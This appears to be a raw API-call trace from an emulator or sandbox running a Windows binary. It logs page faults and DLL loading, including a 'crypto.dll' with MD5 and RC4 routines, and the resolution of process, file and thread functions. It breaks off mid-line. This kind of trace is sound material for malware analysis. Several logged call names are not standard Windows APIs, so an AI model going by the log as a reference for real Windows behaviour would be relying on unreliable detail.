**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D36
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D37
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D38
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D39
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D3A
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D3B
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D3C
0x7C8037F2=KERNEL32!LoadLibraryA ("kernel32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("kernel32.dll")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"FindResourceA")
0x7C8031E7=KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
0x7C80366B=KERNEL32!GetProcAddress (0x77D30000,"CPlApplet")
0x7C803600=KERNEL32!LeaveCriticalSection (0x00000000)
0x7C803831=KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
0x7C8037F2=KERNEL32!LoadLibraryA ("crypto.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("crypto.dll")
0x7C804360=KERNEL32!strcpy (0x04FFFAF6,"C:\WINDOWS\SYSTEM32")
0x7C80436B=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
0x7C804374=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","crypto.dll")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\crypto.dll",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\crypto.dll",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070004
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0000FFD0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0000FFD1
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0000FFD2
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0000FFD3
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0000FFD4
0x7C8037F2=KERNEL32!LoadLibraryA ("MSVCRT.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("MSVCRT.dll")
0x7C804360=KERNEL32!strcpy (0x04FFF8A6,"C:\WINDOWS\SYSTEM32")
0x7C80436B=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
0x7C804374=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","MSVCRT.dll")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\MSVCRT.dll",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\MSVCRT.dll",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070005
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C00
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C01
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C02
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C03
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C04
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C05
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C06
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C07
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C08
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C09
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077C0A
0x7C8037F2=KERNEL32!LoadLibraryA ("kernel32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("kernel32.dll")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"ReadFile")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"lstrcat")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"GetFileSize")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"SetFilePointer")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"GetCommandLineA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"FlushCache")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateProcessA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateThread")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"FetchTrueHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"DeleteFileA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CopyFileA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"ExitThread")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"GetFileAttributesA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
0x7C8031E7=KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
0x7C80366B=KERNEL32!GetProcAddress (0x77C00000,"CPlApplet")
0x7C803600=KERNEL32!LeaveCriticalSection (0x00000000)
0x7C803831=KERNEL32!GetProcAddress (0x77C00000,"_adjust_fdiv")
0x7C803831=KERNEL32!GetProcAddress (0x77C00000,"malloc")
0x7C803831=KERNEL32!GetProcAddress (0x77C00000,"_initterm")
0x7C803831=KERNEL32!GetProcAddress (0x77C00000,"free")
0x7C8037F2=KERNEL32!LoadLibraryA ("KERNEL32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("KERNEL32.dll")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"DisableThreadLibraryCalls")
0x7C8031E7=KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
0x0FFD1B94=MSVCRT!malloc (0x00000080)
0x0FFD1BBE=MSVCRT!_initterm (0x0FFD3000,0x0FFD3004)
0x0FFD1CC8=KERNEL32!DisableThreadLibraryCalls (0x0FFD0000)
0x7C80366B=KERNEL32!GetProcAddress (0x0FFD0000,"CPlApplet")
0x7C803600=KERNEL32!LeaveCriticalSection (0x00000000)
0x7C803831=KERNEL32!GetProcAddress (0x0FFD0000,"MD5Final")
0x7C803831=KERNEL32!GetProcAddress (0x0FFD0000,"MD5Update")
0x7C803831=KERNEL32!GetProcAddress (0x0FFD0000,"MD5Init")
0x7C803831=KERNEL32!GetProcAddress (0x0FFD0000,"rc4_crypt")
0x7C803831=KERNEL32!GetProcAddress (0x0FFD0000,"rc4_setup")
0x7C8031E7=KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
0x7C80366B=KERNEL32!GetProcAddress (0x77DC0000,"CPlApplet")
0x7C803600=KERNEL32!LeaveCriticalSection (0x00000000)
0x7C8094FC=KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\GDI32.DLL")
0x7C80431E=KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\GDI32.DLL")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\GDI32.DLL",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\GDI32.DLL",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070006
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077F10
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077F11
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077F12
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077F13
**PAGE